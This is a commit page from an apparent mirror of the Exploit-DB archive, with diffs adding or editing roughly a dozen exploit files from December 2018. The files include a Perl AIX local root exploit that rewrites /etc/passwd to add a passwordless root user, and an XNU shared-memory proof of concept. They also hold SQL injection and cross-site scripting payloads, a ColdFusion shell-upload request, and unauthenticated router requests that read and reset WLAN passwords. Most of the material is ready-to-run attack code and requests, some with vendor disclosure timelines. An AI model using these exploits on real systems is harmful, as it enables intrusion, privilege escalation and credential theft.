bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2018-12-12

Browse source 
21 changes to exploits/shellcodes

SmartFTP Client 9.0.2623.0 - Denial of Service (PoC)
LanSpy 2.0.1.159 - Local Buffer Overflow (PoC)
XNU - POSIX Shared Memory Mappings have Incorrect Maximum Protection
McAfee True Key - McAfee.TrueKey.Service Privilege Escalation

DomainMOD 4.11.01 - Cross-Site Scripting
DomainMOD 4.11.01 - 'raid' Cross-Site Scripting

Tourism Website Blog - Remote Code Execution / SQL Injection
Alumni Tracer SMS Notification - SQL Injection / Cross-Site Request Forgery
PrestaShop 1.6.x/1.7.x - Remote Code Execution
DomainMOD 4.11.01 - Cross-Site Scripting
PrinterOn Enterprise 4.1.4 - Arbitrary File Deletion
TP-Link wireless router Archer C1200 - Cross-Site Scripting
Huawei B315s-22 - Information Leak
ZTE ZXHN H168N - Improper Access Restrictions
Sitecore CMS 8.2 - Cross-Site Scripting / Arbitrary File Disclosure
IceWarp Mail Server 11.0.0.0 - Cross-Site Scripting
Apache OFBiz 16.11.05 - Cross-Site Scripting
HotelDruid 2.3.0 - 'id_utente_mod' SQL Injection
WordPress Plugin AutoSuggest 0.24 - 'wpas_keys' SQL Injection
ThinkPHP 5.0.23/5.1.31 - Remote Code Execution
Adobe ColdFusion 2018 - Arbitrary File Upload

Linux/x86 - execve(/usr/bin/ncat -lvp 1337 -e /bin/bash)+Null-Free Shellcode (95 bytes)
This commit is contained in:
Offensive Security 2018-12-12 05:01:43 +00:00
parent 9bd9fb0da3
commit a07949d1c7
23 changed files with 1369 additions and 42 deletions

74
exploits/aix/local/45938.pl
View file

@ -17,14 +17,10 @@
# file system, due to incorrect checks in the parsing of the option.
#
# This is a port of the OpenBSD X11 Xorg exploit to run on AIX.
# It overwrites /etc/passwd in order to create a new user with root privile=
ges.=20
# All currently logged in users need to be included when /etc/passwd is ove=
rwritten,
# else AIX will throw 'Cannot get "LOGNAME" variable' when attempting to ch=
ange user.
# The Xorg '-fp' parameter used in the OpenBSD exploit does not work on AIX=
,
# It overwrites /etc/passwd in order to create a new user with root privileges.
# All currently logged in users need to be included when /etc/passwd is overwritten,
# else AIX will throw 'Cannot get "LOGNAME" variable' when attempting to change user.
# The Xorg '-fp' parameter used in the OpenBSD exploit does not work on AIX,
# and is replaced by '-config'.
# ksh93 is used for ANSI-C quoting, and is installed by default on AIX.
#
@ -39,7 +35,7 @@ ange user.
# $ oslevel -s
# 7100-04-00-0000
# $ Xorg -version
# =20
#
# X Window System Version 7.1.1
# Release Date: 12 May 2006
# X Protocol Version 11, Revision 0, Release 7.1.1
@ -50,24 +46,24 @@ ange user.
# to make sure that you have the latest version.
# Module Loader present
# $ id
# uid=3D16500(nmyo) gid=3D1(staff)
# uid=16500(nmyo) gid=1(staff)
# $ perl aixxorg.pl
# [+] AIX X11 server local root exploit
# [-] Checking for Xorg and ksh93=20
# [-] Opening /etc/passwd=20
# [-] Retrieving currently logged in users=20
# [-] Generating Xorg command=20
# [-] Opening /tmp/wow.ksh=20
# [-] Writing Xorg command to /tmp/wow.ksh=20
# [-] Backing up /etc/passwd to /tmp/passwd.backup=20
# [-] Making /tmp/wow.ksh executable=20
# [-] Executing /tmp/wow.ksh=20
# [-] Cleaning up /etc/passwd and removing /tmp/wow.ksh=20
# [-] Done=20
# [+] 'su wow' for root shell=20
# [-] Checking for Xorg and ksh93
# [-] Opening /etc/passwd
# [-] Retrieving currently logged in users
# [-] Generating Xorg command
# [-] Opening /tmp/wow.ksh
# [-] Writing Xorg command to /tmp/wow.ksh
# [-] Backing up /etc/passwd to /tmp/passwd.backup
# [-] Making /tmp/wow.ksh executable
# [-] Executing /tmp/wow.ksh
# [-] Cleaning up /etc/passwd and removing /tmp/wow.ksh
# [-] Done
# [+] 'su wow' for root shell
# $ su wow
# # id
# uid=3D0(root) gid=3D0(system)
# uid=0(root) gid=0(system)
# # whoami
# root
@ -76,14 +72,14 @@ print "[+] AIX X11 server local root exploit\n";
# Check Xorg is in path
print "[-] Checking for Xorg and ksh93 \n";
chomp($xorg =3D `command -v Xorg`);
if ($xorg eq ""){=20
chomp($xorg = `command -v Xorg`);
if ($xorg eq ""){
print "[X] Can't find Xorg binary, try hardcode it? exiting... \n";
exit;
}
# Check ksh93 is in path
chomp($ksh =3D `command -v ksh93`);
chomp($ksh = `command -v ksh93`);
if ($ksh eq ""){
print "[X] Can't find ksh93 binary, try hardcode it? exiting... \n";
exit;
@ -92,36 +88,33 @@ if ($ksh eq ""){
# Read in /etc/passwd
print "[-] Opening /etc/passwd \n";
open($passwd_fh, '<', "/etc/passwd");
chomp(@passwd_array =3D <$passwd_fh>);
chomp(@passwd_array = <$passwd_fh>);
close($passwd_fh);
# Retrieve currently logged in users
print "[-] Retrieving currently logged in users \n";
@users =3D `who | cut -d' ' -f1 | sort | uniq`;
@users = `who | cut -d' ' -f1 | sort | uniq`;
chomp(@users);
# For all logged in users, add their current passwd entry to string
# that will be used to overwrite passwd
$users_logged_in_passwd =3D '';
$users_logged_in_passwd = '';
foreach my $user (@users)
{
$user .=3D ":";
$user .= ":";
foreach my $line (@passwd_array)
{
if (index($line, $user) =3D=3D 0) {
$users_logged_in_passwd =3D $users_logged_in_passwd . '\n' . $l=
ine;
if (index($line, $user) == 0) {
$users_logged_in_passwd = $users_logged_in_passwd . '\n' . $line;
}
}
}
# Use '-config' as '-fp' (which is used in the original BSD exploit) is not=
written to log
# Use '-config' as '-fp' (which is used in the original BSD exploit) is not written to log
print "[-] Generating Xorg command \n";
$blob =3D '-config ' . '$\'' . $users_logged_in_passwd . '\nwow::0:0::/:/us=
r/bin/ksh\n#' . '\'';
$blob = '-config ' . '$\'' . $users_logged_in_passwd . '\nwow::0:0::/:/usr/bin/ksh\n#' . '\'';
print "[-] Opening /tmp/wow.ksh \n";=09=09
print "[-] Opening /tmp/wow.ksh \n";
open($fr, '>', "/tmp/wow.ksh");
# Use ksh93 for ANSI-C quoting
@ -130,7 +123,7 @@ print $fr '#!' . "$ksh\n";
print $fr "$xorg $blob -logfile ../etc/passwd :1 > /dev/null 2>&1 \n";
close $fr;
# Backup passwd=20
# Backup passwd
print "[-] Backing up /etc/passwd to /tmp/passwd.backup \n";
system("cp /etc/passwd /tmp/passwd.backup");
@ -142,8 +135,7 @@ system("/tmp/wow.ksh");
# Replace overwritten passwd with: original passwd + wow user
print "[-] Cleaning up /etc/passwd and removing /tmp/wow.ksh \n";
$result =3D `su wow "-c cp /tmp/passwd.backup /etc/passwd && echo 'wow::0:0=
::/:/usr/bin/ksh' >> /etc/passwd" && rm /tmp/wow.ksh`;
$result = `su wow "-c cp /tmp/passwd.backup /etc/passwd && echo 'wow::0:0::/:/usr/bin/ksh' >> /etc/passwd" && rm /tmp/wow.ksh`;
print "[-] Done \n";
print "[+] 'su wow' for root shell \n";

78
exploits/aspx/webapps/45973.txt Normal file
View file

@ -0,0 +1,78 @@
Exploit title: Sitecore CMS v8.2 multiple vulnerabilities
Product: Sitecore
Version: 8.2, Rev: 161221, Date: 21st December, 2016
Date: 05-05-2017
Author: Usman Saeed
Email: usman@xc0re.net <%20usman@xc0re.net>
Vendor Homepage: http://www.sitecore.net/
Disclaimer: Everything mentioned below is for educational puposes. The
vulnerability details are mentioned as is. I would not be held responsible
for any misuse of this information.
Summary:
Multiple vulnerabilities were found in the Sitecore product. The
vulnerabilities include two instances of arbitrary file access and once
instance of reflected cosssite scripting.
1: Arbitrary file access:
- Description:
The vulnerability lies in the tools which can be accessed via the
administrator user. The vulnerability exists because there is no bound
check for absolute path in the application, that is, if the absolute path
is provided to the vulnerable URL, it reads the path and shows the contents
of the file requested.
- Exploit:
1. Once authenticated as the administrator perform a GET request to the
followiung URL:
/sitecore/shell/Applications/Layouts/IDE.aspx?fi=c:\windows\win.ini
2. Once authenticated as the administrator perform a POST request to the
followiung URL:
POST /sitecore/admin/LinqScratchPad.aspx
HTTP/1.1
Host: <HOST>
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101
Firefox/53.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Content-Type: application/x-www-form-urlencoded
Content-Length: 1463
Referer: <OMITTED>
Cookie: <OMITTED>
Connection: close
Upgrade-Insecure-Requests: 1
__VIEWSTATE= &__VIEWSTATEGENERATOR=
&__EVENTVALIDATION=&LinqQuery=%0D%0A&Reference=c%3A%5Cwindows%
5Cwin.ini&Fetch=
2. Reflected Cross-site Scripting:
- Description:
The application does not sanatize the USER input which allows a normal
authenticated user to exploit this vulnerability.
- Exploit:
POST /sitecore/shell/Applications/Tools/Run HTTP/1.1
Host: <HOST>
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101
Firefox/53.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Content-Type: application/x-www-form-urlencoded
Referer: <OMITTED>
Content-Length: 518
Cookie: <OMITTED>
&__PARAMETERS=run%3Aok&__EVENTTARGET=&__EVENTARGUMENT=&__SOURCE=&__EVENTTYPE=click&__CONTEXTMENU=&__MODIFIED=1&__ISEVENT=1&__SHIFTKEY=&__CTRLKEY=&__ALTKEY=&__BUTTON=0&__KEYCODE=undefined&__X=1763&__Y=883&__URL=https%3A///sitecore/shell/Applications/Tools/Run&__CSRFTOKEN=
&__VIEWSTATE=&__VIEWSTATE=&Program=%3F%3E%3C%3F%3E%3Ciframe%20src%3D%22Javascript%3Aalert(
document.cookie)%3B%22%3E%3C%2Fiframe%3E

19
exploits/hardware/webapps/45970.txt Normal file
View file

@ -0,0 +1,19 @@
[+] Unauthenticated
[+] Author: Usman Saeed (usman [at] xc0re.net)
[+] Affected Version: Firmware version: 1.13 Build 2018/01/24 rel.52299 EU
[·] Impact: Client side attacks are very common and are the source of maximum number of user compromises. With this attack, the threat actor can steal cookies, redirect an innocent victim to a malicious website, thus compromising the user.
[·] Reason: The remote webserver does not filter special characters or illegal input.
[+] Attack type: Remote
[+] Patch Status: Unpatched
[+] Exploitation:
[!] The Cross-site scripting vector can be executed, as illustrated below
http://hostname/webpages/data/_._.<img src=a onerror=alert(“Reflected-XSS”)>../..%2f

124
exploits/hardware/webapps/45971.txt Normal file
View file

@ -0,0 +1,124 @@
#Product Family: LTE
#Model B315s 22
#Firmware version: 21.318.01.00.26
#Author: Usman Saeed (usman [at] xc0re.net)
1. Unauthenticated access to sensitive files:
It was observed that the web application running on the router, allows unauthenticated access to sensitive files on the web server.
POC:
By sending a simple GET request without authentication cookie one can get see valid responses:
Request:
GET /config/deviceinformation/config.xml HTTP/1.1
Host: <omitted>
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
DNT: 1
Connection: close
Response:
HTTP/1.1 200 OK
<?xml version=”1.0″ encoding=”UTF-8″?>
<config>
<devicename>1</devicename>
<serialnumber>0</serialnumber>
<imei>1</imei>
<imsi>1</imsi>
<iccid>0</iccid>
<msisdn>1</msisdn>
<hardwareversion>1</hardwareversion>
<softwareversion>1</softwareversion>
Other resources accessible are:
/config/dialup/config.xml
/config/global/config.xml
/config/global/net-type.xml
/config/lan/config.xml
/config/pcassistant/config.xml
/config/voice/config.xml
/config/wifi/configure.xml
## After discussion with Huawei, according to them as the consequence of this vulnerability is quite low thus they marked it as a non-vulnerability.
2. Unauthenticated valid token generation [CVE-2018-7921]
It was observed that an unauthenticated user can generate “SessionID” and “__RequestVerificationToken” by simply sending an HTTP GET request to “/api/webserver/SesTokInfo”.
These tokens, although might not give the user full access to the router but using these, one can access to several restricted resources on the router.
POC:
First, we send a GET request, as mentioned above.
Request:
GET /api/webserver/SesTokInfo HTTP/1.1
Host: <omitted>
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
DNT: 1
Connection: close
Content-Length: 0
Response:
HTTP/1.1 200 OK
<?xml version=”1.0″ encoding=”UTF-8″?>
<response>
<SesInfo>SessionID=<omitted></SesInfo>
<TokInfo><omitted></TokInfo>
</response>
Now we use these tokens in one of our request where authentication is required:
Request:
GET /api/cradle/status-info HTTP/1.1
Host: <omitted>
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
__RequestVerificationToken: <omitted>
X-Requested-With: XMLHttpRequest
Cookie: SessionID=<omitted>
DNT: 1
Connection: close
Response:
HTTP/1.1 200 OK
<?xml version=”1.0″ encoding=”UTF-8″?>
It is to note with an invalid, expired authentication session, the response is:
Response:
HTTP/1.1 200 OK
<?xml version=”1.0″ encoding=”UTF-8″?>
<error>
<code>125002</code>
<message></message>
</error>
[+] Responsible Disclosure:
Vulnerabilities identified 31/07/2018
Reported to Huawei 31/07/2018
Huwaei patched the vulnerability and issued a CVE 31/08/2018
Public disclosure 01/09/2018

59
exploits/hardware/webapps/45972.txt Normal file
View file

@ -0,0 +1,59 @@
[*] POC: (CVE-2018-7357 and CVE-2018-7358)
Disclaimer: [This POC is for Educational Purposes , I would Not be
responsible for any misuse of the information mentioned in this blog post]
[+] Unauthenticated
[+] Author: Usman Saeed (usman [at] xc0re.net)
[+] Protocol: UPnP
[+] Affected Harware/Software:
Model name: ZXHN H168N v2.2
Build Timestamp: 20171127193202
Software Version: V2.2.0_PK1.2T5
[+] Findings:
1. Unauthenticated access to WLAN password:
POST /control/igd/wlanc_1_1 HTTP/1.1
Host: <IP>:52869
User-Agent: {omitted}
Content-Length: 288
Connection: close
Content-Type: text/xml; charset=”utf-8″
SOAPACTION: “urn:dslforum-org:service:WLANConfiguration:1#GetSecurityKeys” 1
<?xml version=”1.0″ encoding=”utf-8″?>
<s:Envelope xmlns:s=”http://schemas.xmlsoap.org/soap/envelope/” s:encodingStyle=”http://schemas.xmlsoap.org/soap/encoding/”><s:Body><u:GetSecurityKeys xmlns:u=”urn:dslforum-org:service:WLANConfiguration:1″></u:GetSecurityKeys></s:Body></s:Envelope>
2. Unauthenticated WLAN passphrase change:
POST /control/igd/wlanc_1_1 HTTP/1.1
Host: <IP>:52869
User-Agent: {omitted}
Content-Length: 496
Connection: close
Content-Type: text/xml; charset=”utf-8″
SOAPACTION: “urn:dslforum-org:service:WLANConfiguration:1#SetSecurityKeys”
<?xml version=”1.0″ encoding=”utf-8″?>
<s:Envelope xmlns:s=”http://schemas.xmlsoap.org/soap/envelope/” s:encodingStyle=”http://schemas.xmlsoap.org/soap/encoding/”><s:Body><u:SetSecurityKeys xmlns:u=”urn:dslforum-org:service:WLANConfiguration:1″><NewWEPKey0>{omitted}</NewWEPKey0><NewWEPKey1>{omitted}</NewWEPKey1><NewWEPKey2>{omitted}</NewWEPKey2><NewWEPKey3>{omitted}</NewWEPKey3><NewPreSharedKey>{omitted}</NewPreSharedKey><NewKeyPassphrase>{omitted}</NewKeyPassphrase></u:SetSecurityKeys></s:Body></s:Envelope>
[*] Solution:
UPnP should not provide excessive services, and if the fix is not possible, then UPnP should be disabled on the affected devices.
[*] Note:
There are other services which should not be published over UPnP, which are not mentioned in this blog post, as the solution is the same.
[+] Responsible Disclosure:
Vulnerabilities identified 20 August, 2018
Reported to ZTE 28 August, 2018
ZTE official statement 17 September 2018
ZTE patched the vulnerability 12 November 2018
The operator pushed the update 12 November 2018
CVE published Later
Public disclosure 12 November 2018
Ref: http://support.zte.com.cn/support/news/LoopholeInfoDetail.aspx?newsId=1009522

121
exploits/multiple/local/45960.txt Normal file
View file

@ -0,0 +1,121 @@
When the mmap() syscall is invoked on a POSIX shared memory segment
(DTYPE_PSXSHM), pshm_mmap() maps the shared memory segment's pages into the
address space of the calling process. It does this with the following code:
int prot = uap->prot;
[...]
if ((prot & PROT_WRITE) && ((fp->f_flag & FWRITE) == 0)) {
return(EPERM);
}
[...]
kret = vm_map_enter_mem_object(
user_map,
&user_addr,
map_size,
0,
VM_FLAGS_FIXED | VM_FLAGS_OVERWRITE,
vmk_flags,
VM_KERN_MEMORY_NONE,
pshmobj->pshmo_memobject,
file_pos - map_pos,
docow,
prot,
VM_PROT_DEFAULT,
VM_INHERIT_SHARE);
vm_map_enter_mem_object() has the following declaration:
/* Enter a mapping of a memory object */
extern kern_return_t vm_map_enter_mem_object(
vm_map_t map,
vm_map_offset_t *address,
vm_map_size_t size,
vm_map_offset_t mask,
int flags,
vm_map_kernel_flags_t vmk_flags,
vm_tag_t tag,
ipc_port_t port,
vm_object_offset_t offset,
boolean_t needs_copy,
vm_prot_t cur_protection,
vm_prot_t max_protection,
vm_inherit_t inheritance);
This means that `cur_protection` (the initial protection flags for the new memory
object) will be `prot`, which contains the requested protection flags, checked
against the mode of the open file to ensure that a read-only file descriptor can
only be used to create a readonly mapping. However, `max_protection` is always
`VM_PROT_DEFAULT`, which is defined as `VM_PROT_READ|VM_PROT_WRITE`.
Therefore, an attacker with readonly access to a POSIX shared memory segment can
first use mmap() to create a readonly shared mapping of it, then use mprotect()
- which is limited by `max_protection` - to gain write access.
To reproduce:
In terminal 1, as root:
=========================================
bash-3.2# cat > create.c
#include <sys/mman.h>
#include <fcntl.h>
#include <err.h>
#include <unistd.h>
#include <stdio.h>
int main(void) {
shm_unlink("/jh_test");
int fd = shm_open("/jh_test", O_RDWR|O_CREAT|O_EXCL, 0644);
if (fd == -1) err(1, "shm_open");
if (ftruncate(fd, 0x1000)) err(1, "trunc");
char *map = mmap(NULL, 0x1000, PROT_READ|PROT_WRITE, MAP_SHARED, fd, 0);
if (map == MAP_FAILED) err(1, "mmap");
printf("map[0] = 0x%hhx\n", (unsigned char)map[0]);
printf("press enter to continue\n");
getchar();
printf("map[0] = 0x%hhx\n", (unsigned char)map[0]);
}
bash-3.2# cc -o create create.c && ./create
map[0] = 0x0
press enter to continue
=========================================
In terminal 2, as user:
=========================================
Projects-Mac-mini:posix_shm projectzero$ cat > open.c
#include <sys/mman.h>
#include <fcntl.h>
#include <err.h>
#include <stdio.h>
int main(void) {
int fd = shm_open("/jh_test", O_RDWR);
if (fd == -1) perror("open RW");
fd = shm_open("/jh_test", O_RDONLY);
if (fd == -1) err(1, "open RO");
char *map = mmap(NULL, 0x1000, PROT_READ|PROT_WRITE, MAP_SHARED, fd, 0);
if (map == MAP_FAILED) perror("map RW");
map = mmap(NULL, 0x1000, PROT_READ, MAP_SHARED, fd, 0);
if (map == MAP_FAILED) err(1, "map RO");
if (mprotect(map, 0x1000, PROT_READ|PROT_WRITE)) err(1, "mprotect");
map[0] = 0x42;
}
Projects-Mac-mini:posix_shm projectzero$ cc -o open open.c && ./open
open RW: Permission denied
map RW: Operation not permitted
Projects-Mac-mini:posix_shm projectzero$
=========================================
Then, in terminal 1, press enter to continue:
=========================================
map[0] = 0x42
bash-3.2#
=========================================
This demonstrates that the user was able to write to a root-owned POSIX shared
memory segment with mode 0644.

53
exploits/multiple/webapps/45969.txt Normal file
View file

@ -0,0 +1,53 @@
# Exploit Author: bzyo
# CVE: CVE-2018-19936
# Twitter: @bzyo_
# Exploit Title: PrinterOn Enterprise 4.1.4 - Arbitrary File Deletion
# Date: 12-07-18
# Vulnerable Software: PrinterOn Enterprise 4.1.4
# Vendor Homepage: https://www.printeron.com/
# Version: 4.1.4
Tested On
---------------------------------------------------------------------
PrinterOn Enterprise 4.1.4
Windows 2012 R2 Datacenter
Software running under User Account: PONservice (part of local administrators group)
Software Notes
---------------------------------------------------------------------
Per the PrinterOn Enterprise 4.1.4 Installation Guide on Page 10, a local administrator account is required to run the software.
On a default installation, the Post Print Option is to “Delete From Store”. Meaning, if you upload a file to print, this file is deleted immediately after it is printed.
When printing as a Guest or Authenticated user, you have the choice of either uploading a file to be printed or entering a Web Page. The file type you upload or supply via URI needs to be supported by the application in order for it to process and print. Per page 11 of the installation guide, under Recommended Software, its advised to install an application such as Microsoft Word to print .docx documents. There is also some additional configuration needed to be able to print specific file types otherwise you receive an error such as “This type of file cannot be processed by your service”.
Vulnerability
---------------------------------------------------------------------
When either printing as a Guest (when enabled) or as an Authenticated user via the CPS URL https://<hostname or ip>/cps, the user printing has the ability to delete any file on the host system that isnt currently in use by the system itself. The field to enter a web page does not properly check the URI being entered, as such the user can enter a system file path and delete a file on the system.
Exploit
---------------------------------------------------------------------
Login as either Guest or an Authenticated user to print
https://<hostname or ip>/cps
Choose any printer
Entering a system path to a file in the web page field
Examples:
C:\Users\Administrator\Desktop\DoNotDelete.txt
C:\Program Files (x86)\PrinterOn Corporation\Apache Tomcat\Conf\web.xml
Send the print job, an error will show
Check system, file is deleted
Impact
---------------------------------------------------------------------
By deleting specific files the application, and possibly the host system, can become unusable.
Timeline
---------------------------------------------------------------------
10-22-18: Vendor notified of vulnerability
10-22-18: Initial response from vendor
10-23-18: PoC submitted
10-25-18: Vendor to pass along to Product team
11-??-18: New version released
12-03-18: Tested and Confirmed with vendor vulnerability fixed in update
12-07-18: Submitted public disclosure

21
exploits/multiple/webapps/45975.txt Normal file
View file

@ -0,0 +1,21 @@
# Exploit Title: Apache OFBiz v16.11.05 - Stored Cross-Site Scripting Vulnerability
# Google Dork: N/A
# Date: 09 - December - 2018
# Exploit Author: DKM
# Vendor Homepage: https://ofbiz.apache.org/
# Software Link: https://www.apache.org/dyn/closer.lua/ofbiz/apache-ofbiz-16.11.05.zip
# Version: v16.11.05
# Tested on: Windows 10/Ubuntu/Kali Linux
# CVE : N/A
# Description:
A Stored Cross Site Scripting vulnerability is found in the "Text Data" Field within the 'ViewForumMessage' section.
This is because the application does not properly sanitise the users input.
# Steps to Reproduce:
1. Login into the E-Commerce application as any user.
2. Open or the URL will be(https://localhost:8443/ecommerce/control/AddForumThread?forumId=ASK)
3. In "Short Name" give enything you want, Now scroll down and click on "Source" Button, Now in "Text Data" field give payload as: <script>alert(1)</script> and click on "Add"
4. In the next page click on "View" respective to the newly added data and one can see that our XSS Payload gets executed.
5. The same things happens to the message reply page on "ViewForumMessage" which further confirms the presence of stored XSS.

39
exploits/multiple/webapps/45979.txt Normal file
View file

@ -0,0 +1,39 @@
# Exploit Title: Unrestricted file upload in Adobe ColdFusion 2018
# Google Dork: ext:cfm
# Date: 10-12-2018
# Exploit Author: Pete Freitag of Foundeo
# Reversed: Vahagn vah_13 Vardanian
# Vendor Homepage: adobe.com
# Version: 2018
# Tested on: Adobe ColdFusion 2018
# CVE : CVE-2018-15961
# Comment: September 28, 2018: Updates for ColdFusion 2018 and ColdFusion
2016 have been elevated to Priority 1 due to a report that CVE-2018-15961
is now being actively exploited.
```
POST /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/upload.cfm
HTTP/1.1
Host: coldfusion:port
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML,
like Gecko) Chrome/62.0.3202.9 Safari/537.36
Content-Type: multipart/form-data;
boundary=---------------------------24464570528145
Content-Length: 303
Connection: close
Upgrade-Insecure-Requests: 1
-----------------------------24464570528145
Content-Disposition: form-data; name="file"; filename="shell_file"
Content-Type: image/jpeg
%shell code here%
-----------------------------24464570528145
Content-Disposition: form-data; name="path"
shell
-----------------------------24464570528145--
```
a shell will be located here http://coldfusion:port/cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/uploadedFiles/shell_file

102
exploits/php/webapps/45962.txt Normal file
View file

@ -0,0 +1,102 @@
# Exploit Title: Tourism Website Blog - Remote Code Execution / SQL Injection
# Dork: N/A
# Date: 2018-12-06
# Exploit Author: Ihsan Sencan
# Vendor Homepage: https://www.sourcecodester.com/php/12819/tourism-website-blog-faces-negros-web-application.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/chrisjelo/fon_0.zip
# Version: 1.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# POC:
# 1)
# http://localhost/[PATH]/admin/action/add_city.php
#
# http://localhost/[PATH]/image/[FILE]
#
POST /[PATH]/admin/action/add_city.php HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/octet-stream
Content-Length: 329
Cookie: PHPSESSID=hasj51emnq9caak0pf8h8htmm6
DNT: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1
-----------------------------5585745015474: undefined
Content-Disposition: form-data; name="image"; filename="info.php"
<?php
phpinfo();
?>
-----------------------------5585745015474
Content-Disposition: form-data; name="submit"
-----------------------------5585745015474--
HTTP/1.1 302 Found
Date: Wed, 05 Dec 2018 20:29:27 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Location:
Content-Length: 1296
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
# POC:
# 2)
# http://localhost/[PATH]/category.php?category=[SQL]
# http://localhost/[PATH]/info.php?address=[SQL]
# http://localhost/[PATH]/negros%20blog/people_profile.php?acc_id=[SQL]
#
#
GET /[PATH]/category.php?category=Efe%31%32%27%7c%7c%28%53%65%6c%65%43%54%20%27Efe%27%20FroM%20duAL%20WheRE%20110=110%20AnD%20(seLEcT%20112%20frOM(SElecT%20CouNT(*),%43%6f%6e%43%41%54(CONcat(0x203a20,UseR(),DAtaBASe(),VErsION()),(%53%65%4c%45%63%74%20(ELT(112=112,1))),%46%4c%6f%6f%52(RAnd(0)*2))x%20%46%52%4f%4d%20%49%4e%46%4f%72%6d%61%74%49%4f%4e%5f%53%63%68%45%4d%41%2e%50%6c%75%47%49%4e%53%20grOUp%20BY%20%78%29%61%29%29%7c%7c%27 HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=hasj51emnq9caak0pf8h8htmm6
DNT: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1
HTTP/1.1 200 OK
Date: Wed, 05 Dec 2018 20:03:01 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
#
GET /[PATH]/info.php?address=1%31%32%27%7c%7c%28%53%65%6c%65%43%54%20%27Efe%27%20FroM%20duAL%20WheRE%20110=110%20AnD%20(seLEcT%20112%20frOM(SElecT%20CouNT(*),%43%6f%6e%43%41%54(CONcat(0x203a20,UseR(),DAtaBASe(),VErsION()),(%53%65%4c%45%63%74%20(ELT(112=112,1))),%46%4c%6f%6f%52(RAnd(0)*2))x%20%46%52%4f%4d%20%49%4e%46%4f%72%6d%61%74%49%4f%4e%5f%53%63%68%45%4d%41%2e%50%6c%75%47%49%4e%53%20grOUp%20BY%20%78%29%61%29%29%7c%7c%27 HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=hasj51emnq9caak0pf8h8htmm6
DNT: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1
HTTP/1.1 200 OK
Date: Wed, 05 Dec 2018 20:07:42 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=5, max=76
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8

91
exploits/php/webapps/45963.txt Normal file
View file

@ -0,0 +1,91 @@
# Exploit Title: Alumni Tracer SMS Notification - SQL Injection / Cross-Site Request Forgery (Add/Update Admin)
# Dork: N/A
# Date: 2018-12-06
# Exploit Author: Ihsan Sencan
# Vendor Homepage: https://www.sourcecodester.com/php/12825/alumni-tracer-sms-notification-using-phpmysqli.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/janobe/alumnitracer.zip
# Version: 1.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# POC:
# 1)
# http://localhost/[PATH]/index.php?q=blog&id=[SQL]
# http://localhost/[PATH]/index.php?q=alumni&id=201809&sy=[SQL]
# http://localhost/[PATH]/index.php?q=alumni POST / batch=[SQL]&COURSE=[SQL]&submit=
